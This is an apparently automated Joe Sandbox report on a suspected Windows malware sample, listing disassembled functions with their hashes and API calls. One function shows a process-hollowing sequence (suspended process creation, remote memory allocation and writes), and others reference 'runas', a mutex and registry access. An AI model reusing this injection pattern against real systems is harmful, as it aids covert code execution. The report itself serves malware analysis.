Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7551f61c5522ccc807d7d18c35becc41379ac827f05f12f4fce062de0646d20f
Instruction ID: ba1b2c8e3c147497f7771fa501e7dba593bac046fc55ae6058718a627d9f748f
Opcode Fuzzy Hash: 7551f61c5522ccc807d7d18c35becc41379ac827f05f12f4fce062de0646d20f
Instruction Fuzzy Hash: 3D41A472A002149FDB28DB7CDC85BAEB7A5AF45328F11426BE815E73D1DB319940CB54

Function 000D7760 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 468
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8), ref: 000D7A29

Strings

runas, xrefs: 000D72B3

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: runas
API String ID: 3472027048-4000483414
Opcode ID: 07ba4f57d9933cc465349d2d89f76edc1f9ac13c84243f5237b4089aa3e5eea0
Instruction ID: a679ac13d207f80f982f553e3b5333a4111316bde473157d8efabc74182e9274
Opcode Fuzzy Hash: 07ba4f57d9933cc465349d2d89f76edc1f9ac13c84243f5237b4089aa3e5eea0
Instruction Fuzzy Hash: 8FE12971A142489FDB08EB78CD4A79DBB62EF41314F50825DF414AB3C7EB759A40C7A2

Function 000DC296 Relevance: 3.5, APIs: 2, Instructions: 532
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000E7840: __Cnd_destroy_in_situ.LIBCPMT ref: 000E7938
Part of subcall function 000E7840: __Mtx_destroy_in_situ.LIBCPMT ref: 000E7941

Sleep.KERNEL32(00001388), ref: 000DC6E9

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situMtx_destroy_in_situSleep
String ID:
API String ID: 113500496-0
Opcode ID: 0ef6cb1e04d61f82bd683db675ed0ad89cdba56a91a0d41b871451470c3460c0
Instruction ID: 6a30e30d346ce9e405f5f4b8f41d3b9ca55abcb0a4ea220a8d53cf2a2d833588
Opcode Fuzzy Hash: 0ef6cb1e04d61f82bd683db675ed0ad89cdba56a91a0d41b871451470c3460c0
Instruction Fuzzy Hash: C312E171A002499FEF04DF68C889BEDBBB6EF45304F54421AF815A7382D775DA84CBA1

Function 000E6B70 Relevance: 3.0, APIs: 2, Instructions: 23
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000D9910: Sleep.KERNELBASE(000003E8), ref: 000DA875
Part of subcall function 000D9910: CreateMutexA.KERNELBASE(00000000,00000000,001331DC), ref: 000DA893
Part of subcall function 000D9910: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 000DA89C
Part of subcall function 000D9910: GetLastError.KERNEL32 ref: 000DA8A2

Part of subcall function 000D5B00: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 000D606D

CreateThread.KERNEL32(00000000,00000000,Function_00016AB0,00000000,00000000,00000000), ref: 000E6B50
Sleep.KERNEL32(00007530), ref: 000E6B65

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: CreateSleep$ErrorLastMutexObjectOpenSingleThreadWait
String ID:
API String ID: 3106257662-0
Opcode ID: 777ba9241bd3112812f94e9d5c182d903cb5e435c34dfa14566f78e6dc62eccd
Instruction ID: a34b63dd4cf7277fc8783b609413b9d2c4bf1338ee54f549b3ef10c9d10d24ce
Opcode Fuzzy Hash: 777ba9241bd3112812f94e9d5c182d903cb5e435c34dfa14566f78e6dc62eccd
Instruction Fuzzy Hash: DEE08C30A84744ABF23033A26C07F9D79146B05B91F240222BB197E2D39EE0344095BF

Function 000DD039 Relevance: 1.9, APIs: 1, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000DD047

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 02b7776cf0cef695a7e6869d1350c6a0ba8c94721c638cf531c4baac4770262c
Instruction ID: 7be6db8e2548fed9928676cb2961f647edd0f84e759efba566ce536f169668c0
Opcode Fuzzy Hash: 02b7776cf0cef695a7e6869d1350c6a0ba8c94721c638cf531c4baac4770262c
Instruction Fuzzy Hash: CEE1E771A002549FEB19DB28CD497DDBB71AF46304F5082DEE4086B3C3DB759B858BA2

Function 000DD5B0 Relevance: 1.7, APIs: 1, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 970991a7b8a96d8c729ac8aa319e6a2702095ec2fb7c5f6edb7f19d5bdec6cc5
Instruction ID: c70f5b6993606a4911d5a4a5577298c40e2cf5f39f38cc0b5b121cd2676b1de1
Opcode Fuzzy Hash: 970991a7b8a96d8c729ac8aa319e6a2702095ec2fb7c5f6edb7f19d5bdec6cc5
Instruction Fuzzy Hash: 6551BC709042689FEB25DB28CC89BDEBBB1AB05304F5041DAD44967382DB755FC8CFA1

Function 000DC7D0 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b56f09e4990dce11aee33c818285c152c47253d2a008c05c97da7b3602337828
Instruction ID: 070fe13ab519979fca7bbcaa360c92600a637e32099d7e5a801873b1298f68a9
Opcode Fuzzy Hash: b56f09e4990dce11aee33c818285c152c47253d2a008c05c97da7b3602337828
Instruction Fuzzy Hash: 75319031A10249AFEB04DF68C989BDEBBB5FF48704F50421AF815A7381DB75D980CB90

Function 0010AAF3 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 0010AB2D

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 36205eb667265235a882149a2818d7c2f0f5149fe768eacdb0bab3da6dc82df7
Instruction ID: 5c19886a96f2234ce8f77cf18de5d06583ee01a4a6d809019ad87aad4e2bf3a9
Opcode Fuzzy Hash: 36205eb667265235a882149a2818d7c2f0f5149fe768eacdb0bab3da6dc82df7
Instruction Fuzzy Hash: 25110371A0420AAFCB05DF58E94199A7BF9EF48304B0540AAF809AB251D770EE158BA5

Function 001118CE Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00111931

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
Instruction ID: e6a3928d56da4db017705e22c502c34fe28a62ff76fa802e3e2d9ca09a9f80ad
Opcode Fuzzy Hash: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
Instruction Fuzzy Hash: 77012C72C0025DBFCF02AFA88C019EEBFB9AF18314F144165FA64E2191E7718A619B91

Function 00111615 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00111A05,?,?,00000000,?,00111A05,00000000,0000000C), ref: 00111632

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 47186348572383fb6cc40c4aa8143474a16fe72e175f771a04e26abfb5c8969d
Instruction ID: 1a04f8dc609f171391182b35aa0d31ac337bec04cb1abe5ee0802e58ec4bacc1
Opcode Fuzzy Hash: 47186348572383fb6cc40c4aa8143474a16fe72e175f771a04e26abfb5c8969d
Instruction Fuzzy Hash: 7ED06C3200010DFBDF128F84DC06EDA3BAAFB4C714F118100BA1856021C732E872AB90

Function 000D86C2 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?), ref: 000D86C9

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4d679ed1bdb840f66e9744296c650580de24648356e4459c9e6be56b88603d7e
Instruction ID: cc8ec7df718e92bf101129ee7a0947e75e24adf30a94019ff88042d210e571e4
Opcode Fuzzy Hash: 4d679ed1bdb840f66e9744296c650580de24648356e4459c9e6be56b88603d7e
Instruction Fuzzy Hash: 84C08C301017001BEE2C0A38668C09A33429B473F83D44B86E0B18A2F2CB39E847D720

Function 000D86C0 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?), ref: 000D86C9

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b27125543c0e86ae13fbd7970fc0cd768b513298578bdc0ff202680251732651
Instruction ID: 1f31ddb445f728e877e22aecd212d62a239b6c0657290b15cd2877c097482369
Opcode Fuzzy Hash: b27125543c0e86ae13fbd7970fc0cd768b513298578bdc0ff202680251732651
Instruction Fuzzy Hash: D8C08C301013009BEA2C4B38A64C0263712AB023793E04B8AE0728A2F2CB36D843CB30

Non-executed Functions

Function 000EC66B Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000EC671
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000EC67F
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000EC690
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000EC6A1
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000EC6B2
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000EC6C3
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 000EC6D4
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 000EC6E5
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 000EC6F6
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000EC707
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000EC718
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000EC729
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000EC73A
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000EC74B
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000EC75C
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000EC76D
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000EC77E
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 000EC78F
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 000EC7A0
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 000EC7B1
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 000EC7C2
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 000EC7D3
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 000EC7E4
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 000EC7F5
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 000EC806
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 000EC817
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 000EC828
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 000EC839
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 000EC84A
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 000EC85B
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 000EC86C
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 000EC87D
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 000EC88E
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 000EC89F
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 000EC8B0
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 000EC8C1
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 000EC8D2
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 000EC8E3
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 000EC8F4
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 000EC905
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 000EC916

Strings

kernel32.dll, xrefs: 000EC66C
GetCurrentPackageId, xrefs: 000EC7C8
SetFileInformationByHandle, xrefs: 000EC7FB
InitializeConditionVariable, xrefs: 000EC81D
GetLocaleInfoEx, xrefs: 000EC8FA
GetTickCount64, xrefs: 000EC7D9
FlsAlloc, xrefs: 000EC679
CreateSymbolicLinkW, xrefs: 000EC7BC
GetCurrentProcessorNumber, xrefs: 000EC7A6
SetThreadpoolTimer, xrefs: 000EC71E
TryAcquireSRWLockExclusive, xrefs: 000EC883
FlsGetValue, xrefs: 000EC696
WaitForThreadpoolTimerCallbacks, xrefs: 000EC72F
CreateThreadpoolWork, xrefs: 000EC8B6
CloseThreadpoolWait, xrefs: 000EC773
CreateSemaphoreW, xrefs: 000EC6EB
InitializeCriticalSectionEx, xrefs: 000EC6B8
CreateEventExW, xrefs: 000EC6DA
FlushProcessWriteBuffers, xrefs: 000EC784
CreateSemaphoreExW, xrefs: 000EC6FC
CreateThreadpoolTimer, xrefs: 000EC70D
ReleaseSRWLockExclusive, xrefs: 000EC894
CompareStringEx, xrefs: 000EC8E9
CreateThreadpoolWait, xrefs: 000EC751
FreeLibraryWhenCallbackReturns, xrefs: 000EC795
GetSystemTimePreciseAsFileTime, xrefs: 000EC80C
SubmitThreadpoolWork, xrefs: 000EC8C7
WakeAllConditionVariable, xrefs: 000EC83F
AcquireSRWLockExclusive, xrefs: 000EC872
InitializeSRWLock, xrefs: 000EC861
FlsFree, xrefs: 000EC685
CloseThreadpoolTimer, xrefs: 000EC740
SetThreadpoolWait, xrefs: 000EC762
WakeConditionVariable, xrefs: 000EC82E
InitOnceExecuteOnce, xrefs: 000EC6C9
GetFileInformationByHandleEx, xrefs: 000EC7EA
LCMapStringEx, xrefs: 000EC90B
FlsSetValue, xrefs: 000EC6A7
CloseThreadpoolWork, xrefs: 000EC8D8
SleepConditionVariableSRW, xrefs: 000EC8A5
SleepConditionVariableCS, xrefs: 000EC850

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 858c253c381e4c6be48611294db2d0074cda0fb44679297bdfc9fad726bd2d67
Instruction ID: b43630389d088d683d1a8798b4dcc8108e46af4993a3414e899786d87142b028
Opcode Fuzzy Hash: 858c253c381e4c6be48611294db2d0074cda0fb44679297bdfc9fad726bd2d67
Instruction Fuzzy Hash: 32617FB1952720BBD711EFB0BC0EF593AAAFB2DB42745061AF105E2D61D7B840A18F5C

Function 000D7050 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000D707D
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 000D70DB
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 000D70F4
GetThreadContext.KERNEL32(?,00000000), ref: 000D7109
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 000D7129
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 000D716B
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 000D7188
VirtualFree.KERNEL32(?,00000000,00008000), ref: 000D7241

Strings

VUUU, xrefs: 000D6EF1
, xrefs: 000D7120
invalid stoi argument, xrefs: 000D7040

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
String ID: $VUUU$invalid stoi argument
API String ID: 3796053839-3954507777
Opcode ID: ee072621f66f37e4c0c963bd8e699d8b16fb92467182ca6f7e107d2351bf3900
Instruction ID: 1a0f9b18c5746904a19f7b196e71a470bc681f614fae749e2e8f7539b1eb2485
Opcode Fuzzy Hash: ee072621f66f37e4c0c963bd8e699d8b16fb92467182ca6f7e107d2351bf3900
Instruction Fuzzy Hash: D6418170244341BFE7619F54DC05F5A7BE8BF48704F400519F788E66D0E7B0A955CBAA

Function 000F0D23 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 000F0E26
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 000F0E72

Part of subcall function 000F256D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 000F2660

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 000F0EDE
